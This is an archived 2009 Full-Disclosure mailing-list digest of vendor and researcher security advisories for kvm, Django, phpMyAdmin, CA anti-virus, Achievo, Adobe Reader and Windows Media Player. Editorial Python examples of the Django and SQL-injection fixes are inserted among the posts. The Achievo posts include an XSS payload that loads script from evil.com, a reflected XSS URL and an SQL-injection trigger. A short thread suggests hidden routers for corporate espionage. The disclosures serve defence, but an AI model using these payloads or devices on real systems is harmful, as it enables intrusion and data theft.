[Full-disclosure] [SECURITY] [DSA 1907-1] New kvm packages fix several vulnerabilities

2009-10-13 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1907-1  secur...@debian.org
http://www.debian.org/security/  Giuseppe Iuculano
October 13, 2009  http://www.debian.org/security/faq
- 

Package: kvm
Vulnerability  : several vulnerabilities
Problem type   : local (remote)
Debian-specific: no
Debian bugs: 509997 548975
CVE Ids: CVE-2008-5714 CVE-2009-3290


Several vulnerabilities have been discovered in kvm, a full virtualization 
system.
The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2008-5714

Chris Webb discovered an off-by-one bug limiting KVM's VNC passwords to 7
characters. This flaw might make it easier for remote attackers to guess the VNC
password, which is limited to seven characters where eight was intended.

CVE-2009-3290

It was discovered that the kvm_emulate_hypercall function in KVM does not
prevent access to MMU hypercalls from ring 0, which allows local guest OS users
to cause a denial of service (guest kernel crash) and read or write guest kernel
memory.


For the stable distribution (lenny), these problems have been fixed in version
72+dfsg-5~lenny3.

The oldstable distribution (etch) does not contain kvm.

For the testing distribution (squeeze) these problems will be fixed soon.

For the unstable distribution (sid) these problems have been fixed in version
85+dfsg-4.1


We recommend that you upgrade your kvm packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] List Charter

2009-10-13 Thread John Cartwright

[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclos...@lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.



[Full-disclosure] DEFCON London - DC4420 October 2009 Meet - This Thursday 15th

2009-10-13 Thread Major Malfunction
this month we have three great talks lined up, and, if Alien actually 
remembers to bring the shwag, we *will* have an auction for Hackers for 
Charity/EFF!!!

talks are:


   y3d: stego in directories - Subere

   Evoting Machines - Glyn

   Eye in the sky. - Merlin


time / date:

  18:00 for 19:30
  Thursday 15th October 2009

location:

  Sound Club
  1 Leicester Square,
  London,
  WC2H 7NA


Location Map: Sound Club, Leicester Square:

http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1+Leicester+Square,+London,+Westminster,+WC2H

this is the NW corner of the square... if you stand facing the Empire
Cinema/Casino, it's two doors to the left...

confusion/faq:

 yes, it's a nightclub by name.
 no, there is no clubbing / loud music / scantily clad women / poles.
 no, there is no charge at the door - tell the bouncer you are there
for dc4420 and they will let you in.

tube:

  Leicester Square on the Piccadilly and Northern Lines.
  Piccadilly Circus on the Piccadilly and Bakerloo Lines.

bus:

Leicester Square Bus Map:

http://www.tfl.gov.uk/tfl/gettingaround/maps/buses/pdf/leicestersquare-10899.pdf

food :

 food is available at the venue - see the menu at:

 http://dc4420.org/files/soundclub/july_menu.jpg

oh, and we beat them up about the beer prices (again) so hopefully we'll 
be able to afford more than 1/2 pint each this month... :P

see you there!

cheers,
MM
-- 
In DEFCON, we have no names... errr... well, we do... but silly ones...



[Full-disclosure] [ MDVSA-2009:274 ] phpmyadmin

2009-10-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:274
 http://www.mandriva.com/security/
 ___

 Package : phpmyadmin
 Date: October 13, 2009
 Affected: Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 This is a security release for XSS and SQL injection problems.
 
 This upgrade provides phpmyadmin 2.11.9.6 for CS4 and 3.2.2.1 for
 MES5, which are not vulnerable to these security issues.
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



Re: [Full-disclosure] Cellphone with USB host

2009-10-13 Thread Michael Holstein

 AFAIK, it's a field of one:
   

http://www.hackerspace.net/hostilewrt

A WRT-54GL with a LiPO battery will run for (at least) a week. The PCB 
inside fits in a long Kleenex box along with a battery underneath it and 
some real kleenex on top. Scatter a few around as needed.

Cheers,

Michael Holstein
Cleveland State University



Re: [Full-disclosure] Cellphone with USB host

2009-10-13 Thread Shawn Merdinger
Hi Valdis,

I did a CSI NetSec preso on this and touched on the WRT54G, Nokia 770,
Gumstix and (my personal favorite) PicoTux as good candidates for
corporate espionage hijinks.

Slides are here:
http://www.slideshare.net/shawn_merdinger/csi-netsec-2006-poor-mans-guide-merdinger-1251099

Cheers,
--scm


On Sat, Oct 10, 2009 at 12:18 PM,  valdis.kletni...@vt.edu wrote:

 So guys - what would be the ideal corporate-espionage device, and what's
 the best approximation currently on the market?



[Full-disclosure] [ MDVSA-2009:275 ] python-django

2009-10-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:275
 http://www.mandriva.com/security/
 ___

 Package : python-django
 Date: October 13, 2009
 Affected: 2008.1
 ___

 Problem Description:

 A vulnerability has been found and corrected in python-django:
 
 The Admin media handler in core/servers/basehttp.py in Django 1.0
 and 0.96 does not properly map URL requests to expected static media
 files, which allows remote attackers to conduct directory traversal
 attacks and read arbitrary files via a crafted URL (CVE-2009-2659).
 
 The versions of Django shipping with Mandriva Linux have been updated
 to the latest patched version that includes the fix for this issue.
 In addition, they provide other bug fixes.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2659
 http://www.djangoproject.com/weblog/2009/jul/28/security/
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



[Full-disclosure] [G-SEC 46-2009] Computer Associates multiple products arbitrary code execution

2009-10-13 Thread Thierry Zoller


   Computer Associates (CA) Anti-Virus
  Multiple products - arbitrary code execution


Release mode  : Coordinated
Reference : [GSEC-46-2009] - Computer Associates multiple products RCE
WWW   : http://blog.g-sec.lu/2009/10/computer-associates-multiple-products.html
Vendor: http://www.ca.com
Status: Patched
CVE   : CVE-2009-3587  CVE-2009-3588
Credit: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878
Discovered by : Thierry Zoller (G-SEC)
Vendor reaction rating : near perfect*
* Continuous feedback on progress, CVE numbers, in-depth investigation of the
  issues at hand


Affected products : 
~~~
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1
CA Anti-Virus 2007 (v8)
CA Anti-Virus 2008
CA Anti-Virus 2009
CA Anti-Virus Plus 2009
eTrust EZ Antivirus r7.1
CA Internet Security Suite 2007 (v3)
CA Internet Security Suite 2008
CA Internet Security Suite Plus 2008
CA Internet Security Suite Plus 2009
CA Threat Manager for the Enterprise (formerly eTrust Integrated 
   Threat Management) r8
CA Threat Manager for the Enterprise (formerly eTrust Integrated 
   Threat Management) 8.1
CA Threat Manager Total Defense
CA Gateway Security r8.1
CA Protection Suites r2
CA Protection Suites r3
CA Protection Suites r3.1
CA Secure Content Manager (formerly eTrust Secure Content 
   Manager) 1.1
CA Secure Content Manager (formerly eTrust Secure Content 
   Manager) 8.0
CA Network and Systems Management (NSM) (formerly Unicenter 
   Network and Systems Management) r3.0
CA Network and Systems Management (NSM) (formerly Unicenter 
   Network and Systems Management) r3.1
CA Network and Systems Management (NSM) (formerly Unicenter 
   Network and Systems Management) r11
CA Network and Systems Management (NSM) (formerly Unicenter 
   Network and Systems Management) r11.1
CA ARCserve Backup r11.5 on Windows
CA ARCserve Backup r12 on Windows
CA ARCserve Backup r12.0 SP1 on Windows
CA ARCserve Backup r12.0 SP 2 on Windows
CA ARCserve Backup r12.5 on Windows
CA ARCserve Backup r11.1 Linux
CA ARCserve Backup r11.5 Linux
CA ARCserve for Windows Client Agent
CA ARCserve for Windows Server component
CA eTrust Intrusion Detection 2.0 SP1
CA eTrust Intrusion Detection 3.0
CA eTrust Intrusion Detection 3.0 SP1
CA Common Services (CCS) r3.1
CA Common Services (CCS) r11
CA Common Services (CCS) r11.1
CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)
CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1

Affected Platforms:
~~~
Windows
UNIX
Linux
Solaris
Mac OS X
Netware


Patch availability :

Patches have been available since 09.10.2009. Please follow the steps listed
here: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878


I. Background
~
Quote: 
CA is one of the world's largest IT management software providers.
We serve more than 99% of Fortune 1000 companies, as well as government 
entities, educational institutions and thousands of other companies 
in diverse industries worldwide 

CA Anti-Virus for the Enterprise is the next generation in comprehensive 
anti-virus security for business PCs, servers and PDAs. It combines 
proactive protection against malware with new, powerful management 
features that stop and remove malicious code before it enters your 
network, reducing system downtime


II. Description
~~~
Improper handling of a specially crafted RAR archive file by the CA 
Anti-Virus engine arclib component leads to heap corruption and 
allows the attacker to cause a denial of service or possibly 
further compromise the system.

The attacker has control over EBX:

Basic Block:
6e4305b0 mov cl,byte ptr [ebx]
   Tainted Input Operands: ebx
6e4305b2 add edi,28h
6e4305b5 push edi
6e4305b6 lea edx,[esp+14h]
6e4305ba mov byte ptr [esp+14h],cl
   Tainted Input Operands: cl
6e4305be inc ebx
   Tainted Input Operands: ebx
6e4305bf push edx
6e4305c0 mov ecx,esi
6e4305c2 mov dword ptr [esp+1ch],ebx
   Tainted Input Operands: ebx
6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)



III. Impact
~~~
The impact ranges from denial of service to potential remote arbitrary code
execution. Due to the nature of anti-virus products, the attack vectors can be
near endless. An attack could be carried out by way of an e-mail message
carrying a RAR attachment (of a file recognised as being RAR), USB, CD, network
data etc.

Please note that this is a general problem and not exclusive to Computer 
Associates.


IV. Disclosure timeline
~
DD.MM.
11.05.2009 - 

[Full-disclosure] [ MDVSA-2009:276 ] python-django

2009-10-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:276
 http://www.mandriva.com/security/
 ___

 Package : python-django
 Date: October 13, 2009
 Affected: 2009.0, 2009.1, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in python-django:
 
 The Admin media handler in core/servers/basehttp.py in Django 1.0
 and 0.96 does not properly map URL requests to expected static media
 files, which allows remote attackers to conduct directory traversal
 attacks and read arbitrary files via a crafted URL (CVE-2009-2659).
 
 Algorithmic complexity vulnerability in the forms library in Django
 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause
 a denial of service (CPU consumption) via a crafted (1) EmailField
 (email address) or (2) URLField (URL) that triggers a large amount
 of backtracking in a regular expression (CVE-2009-3695).
 
 The versions of Django shipping with Mandriva Linux have been updated
 to the latest patched version that includes the fixes for these issues.
 In addition, they provide other bug fixes.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2659
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3695
 http://www.djangoproject.com/weblog/2009/jul/28/security/
 http://www.djangoproject.com/weblog/2009/oct/09/security/
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com

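The two Mandriva python-django advisories above describe a path traversal in the admin media handler (CVE-2009-2659) and regex backtracking in EmailField/URLField (CVE-2009-3695). The following is an added example, not Django's or Mandriva's code: a media-path resolver that refuses requests escaping the media root, and an email check that caps input length before any regex runs. The media root, paths and the regex are constructed for this example.

```python
"""Added example, not Django's or Mandriva's code: a media-path resolver that
refuses requests escaping the media root (the CVE-2009-2659 traversal class)
and an email check that bounds input length before any regex runs (the
CVE-2009-3695 backtracking class). Root, paths and regex are constructed."""
import os
import re
from urllib.parse import unquote


def resolve_media_path(media_root, request_path):
    """Map the path part of a /media/ request to a file below media_root.

    Returns the absolute filesystem path, or None when the decoded request
    would land outside media_root (or on the root itself), contains a NUL
    byte, or uses backslashes that some layers treat as separators.
    """
    root = os.path.realpath(media_root)
    # Decode percent-encoding first so "%2e%2e" is seen as ".." here and not
    # only by the filesystem later.
    decoded = unquote(request_path)
    if "\x00" in decoded or "\\" in decoded:
        return None
    relative = decoded.lstrip("/")
    # realpath collapses ".." (and symlinks, where the path exists); the
    # result must still have media_root as its common prefix. commonpath is
    # used instead of startswith() so "/srv/admin_media2" is not accepted as
    # being under "/srv/admin_media".
    candidate = os.path.realpath(os.path.join(root, relative))
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:  # mixed absolute/relative paths or different drives
        return None
    if not inside or candidate == root:
        return None
    return candidate


# RFC 5321 bounds a full address at 254 octets; anything longer is rejected
# before the regular expression sees it, so matching cost stays bounded.
MAX_EMAIL_LENGTH = 254

# Constructed pattern, not Django's: the local-part class cannot match "@"
# and the domain-label class cannot match ".", so the engine has exactly one
# way to split the input and cannot backtrack catastrophically.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")


def is_plausible_email(value):
    """Cheap length guard first, then a linear-time anchored match."""
    if not isinstance(value, str) or len(value) > MAX_EMAIL_LENGTH:
        return False
    return _EMAIL_RE.match(value) is not None
```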


[Full-disclosure] [BONSAI] XSS in Achievo - Customized XSS payload included

2009-10-13 Thread Bonsai - Information Security
   Bonsai Information Security - Advisory
 http://www.bonsai-sec.com/research/

   Multiple XSS in Achievo

1. *Advisory Information*

Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL: 
http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2733


3. *Software Description*

Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, but effective
manner [0].


4. *Vulnerability Description*

Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it.

For additional information, please read [1].


5. *Vulnerable packages*

Version = 1.3.4


6. *Non-vulnerable packages*

Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:
http://www.achievo.org/


7. *Credits*

This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).


8. *Technical Description*

8.1 A Persistent Cross Site Scripting vulnerability was found in the 'tittle'
variable within the scheduler module. This is because the application does not
properly sanitise the user's input. The vulnerability can be triggered by a user
submitting the following data within the scheduler title:

<SCRIPT SRC=//evil.com/xss.js></SCRIPT>

Which will include the xss.js JavaScript file within the schedule. A JavaScript
that exploits this issue and creates a new administrator user in the system can
be found in Bonsai's blog [2].

8.2 A Reflected Cross Site Scripting vulnerability was found in the
atksearch[contractnumber], atksearch_AE_customer[customer] and
atksearchmode[contracttype] variables within the 'Organisation Contracts'
administration page. This is because the application does not properly sanitise
the user's input. The vulnerability can be triggered by clicking on the
following URL:

http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]=;<script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]=<script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]=<script>alert('xss');</script>&atksearchmode[customer]=substring

9. *Report Timeline*

- 2009-07-09:
Vulnerabilities were identified.

- 2009-08-08:
Vendor contacted.

- 2009-08-12:
Vendor confirmed vulnerabilities.

- 2009-08-14:
Vendor sets possible release date of fixed version to Monday 12 Oct.

- 2009-10-12:
Vendor released fixed version.

- 2009-10-13:
The advisory BONSAI-2009-0101 is published.


10. *References*

[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/

11. *About Bonsai*

Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers' real needs.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is
given.



[Full-disclosure] [BONSAI] SQL Injection in Achievo

2009-10-13 Thread Bonsai - Information Security
   Bonsai Information Security - Advisory
 http://www.bonsai-sec.com/research/

 SQL Injection in Achievo


1. *Advisory Information*

Title: SQL Injection in Achievo
Advisory ID: BONSAI-2009-0102
Advisory URL: 
http://www.bonsai-sec.com/research/vulnerabilities/achievo-sql-injection-0102.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release


2. *Vulnerability Information*

Class: SQL Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2734


3. *Software Description*

Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, but effective
manner [0].


4. *Vulnerability Description*

SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input
is not strongly typed and thereby unexpectedly executed.

For additional information, please look at the references [1] and [2].


5. *Vulnerable packages*

Version = 1.3.4


6. *Non-vulnerable packages*

Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:
http://www.achievo.org/


7. *Credits*

This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).


8. *Technical Description*

A SQL injection vulnerability was found in the dispatch.php script, more
specifically in the $user_id variable. The vulnerability can be triggered by
logging into Achievo and browsing to:

/dispatch.php?atknodetype=reports.weekreport&atkaction=report&nameswitch=name&userid=%27&functionlevelswitch=all&startdate[day]=6&startdate[month]=7&startdate[year]=2009&enddate[day]=17&enddate[month]=7&enddate[year]=2009&showstatus=all&outputType=0&atkorderby=period

Which will generate a syntax error in the database. The following is
the corresponding piece of code:

classweekreport.inc:128-134
function get_employee($user_id)
{
  $db = atkGetDb();
  // $user_id is interpolated straight into the SQL string with no escaping or
  // parameter binding: a single quote in it (the %27 above) breaks the query.
  $sql = "SELECT * FROM person WHERE status='active' AND id='$user_id'";
  $record = $db->getrows($sql);
  return $record[0];
}


9. *Report Timeline*

- 2009-07-09:
Vulnerabilities were identified.

- 2009-08-08:
Vendor contacted.

- 2009-08-12:
Vendor confirmed vulnerabilities.

- 2009-08-14:
Vendor sets possible release date of fixed version to Monday 12 Oct.

- 2009-10-12:
Vendor released fixed version.

- 2009-10-13:
The advisory BONSAI-2009-0101 is published.


10. *References*

[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/SQL_injection
[2] http://en.wikipedia.org/wiki/SQL_injection

11. *About Bonsai*

Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers' real needs.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is
given.

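As an added example (not Achievo's code), the get_employee() lookup from the advisory rebuilt in Python over an in-memory SQLite table, so the quoted input from the advisory URL (userid=%27) can be compared against a parameterised query. The person table and its rows are constructed here.

```python
"""Added example, not Achievo's code: the get_employee() pattern from the
advisory on an in-memory SQLite database, vulnerable form beside the
parameterised form. The 'person' table and its rows are constructed."""
import sqlite3


def make_db():
    """Constructed sample data mirroring the 'person' table in the advisory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE person (id INTEGER, name TEXT, status TEXT)")
    db.executemany("INSERT INTO person VALUES (?, ?, ?)",
                   [(1, "alice", "active"), (2, "bob", "inactive")])
    return db


def get_employee_vulnerable(db, user_id):
    """Same shape as the PHP in classweekreport.inc: user_id is pasted into
    the SQL text, so a quote in it changes the statement's structure."""
    sql = f"SELECT * FROM person WHERE status='active' AND id='{user_id}'"
    rows = db.execute(sql).fetchall()
    return rows[0] if rows else None


def get_employee_safe(db, user_id):
    """Parameterised form: user_id travels as a bound value, never as SQL."""
    sql = "SELECT * FROM person WHERE status='active' AND id=?"
    rows = db.execute(sql, (user_id,)).fetchall()
    return rows[0] if rows else None


def demo():
    """Run both forms on the advisory's input ("'" once %27 is decoded).

    Returns (vulnerable_error, safe_result): the vulnerable query fails with
    the syntax error the advisory reports, while the parameterised query
    simply finds no row with that id.
    """
    db = make_db()
    injected = "'"
    try:
        get_employee_vulnerable(db, injected)
        error = None
    except sqlite3.OperationalError as exc:
        error = str(exc)
    return error, get_employee_safe(db, injected)
```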


[Full-disclosure] iDefense Security Advisory 10.13.09: Adobe Acrobat and Reader U3D File Invalid Array Index Vulnerability

2009-10-13 Thread iDefense Labs
iDefense Security Advisory 10.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 13, 2009

I. BACKGROUND

Adobe Reader and Acrobat are programs for viewing and editing Portable
Document Format (PDF) documents. For more information, see the vendor's
site at the following links.

http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobatpro/

II. DESCRIPTION

Remote exploitation of an invalid array index vulnerability in Adobe
Systems Inc.'s Reader and Acrobat could allow an attacker to execute
arbitrary code with the privileges of the current user.

The vulnerability occurs when parsing a U3D file embedded inside of a
PDF. U3D is a file format used to represent 3D images.

When parsing a U3D file, the parsing code fails to validate a value from
the file that is used as an index into a list of objects. This lets an
attacker specify an arbitrary value for a function pointer, which leads
to the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user opening the file. If the Adobe
Reader browser plugin is enabled (this is the default setting), then
this vulnerability can be exploited automatically by simply visiting a
malicious webpage with an embedded PDF. If the browser plugin is
disabled, an attacker needs to convince a user to open a malicious
file.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in Reader and
Acrobat versions 9.1.3 and 8.1.6. Previous versions may also be
affected.

V. WORKAROUND

A possible mitigation is to prevent Adobe Reader/Acrobat from opening
files directly in the browser. If this functionality is disabled, then
the user will have to open the file via the 'Open' button (or save it
and open it later manually) if it is embedded in a webpage.

Additionally, disabling JavaScript in Adobe Reader/Acrobat will make the
vulnerability more difficult to exploit in a reliable fashion.

VI. VENDOR RESPONSE

Adobe has addressed this issue with an update. Further details and
patches can be found at the following URL.

http://www.adobe.com/support/security/bulletins/apsb09-15.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2009-2990 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/09/2009  Initial vendor notification
06/09/2009  Initial vendor response
10/13/2009  Coordinated Public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Dionysus Blazakis.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


[Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread Berend-Jan Wever
Adobe bulletin:
http://www.adobe.com/support/security/bulletins/apsb09-15.html

Short description and repro case:
http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/
Cheers,

SkyLined
http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/
Berend-Jan Wever berendjanwe...@gmail.com
http://skypher.com/SkyLined

[Full-disclosure] MSIE Content-Encoding: deflate memory corruption vulnerability

2009-10-13 Thread Berend-Jan Wever
Microsoft bulletin:
http://www.microsoft.com/technet/security/bulletin/MS09-054.mspx

Short description and repro information:
http://skypher.com/index.php/2009/10/13/ms09-054cve-2009-1547-data-stream-header-corruption-vulnerability/

Cheers,
SkyLined

Berend-Jan Wever berendjanwe...@gmail.com
http://skypher.com/SkyLined

[Full-disclosure] ZDI-09-069: Microsoft Windows Media Player Audio Voice Sample Rate Memory Corruption Vulnerability

2009-10-13 Thread ZDI Disclosures
ZDI-09-069: Microsoft Windows Media Player Audio Voice Sample Rate Memory 
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-069
October 13, 2009

-- CVE ID:
CVE-2009-0555

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Windows Media Player 11
Microsoft Windows Media Player 10

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8645. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows Media Player. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious web page.

The specific flaw exists in the handling of Windows media audio files. 
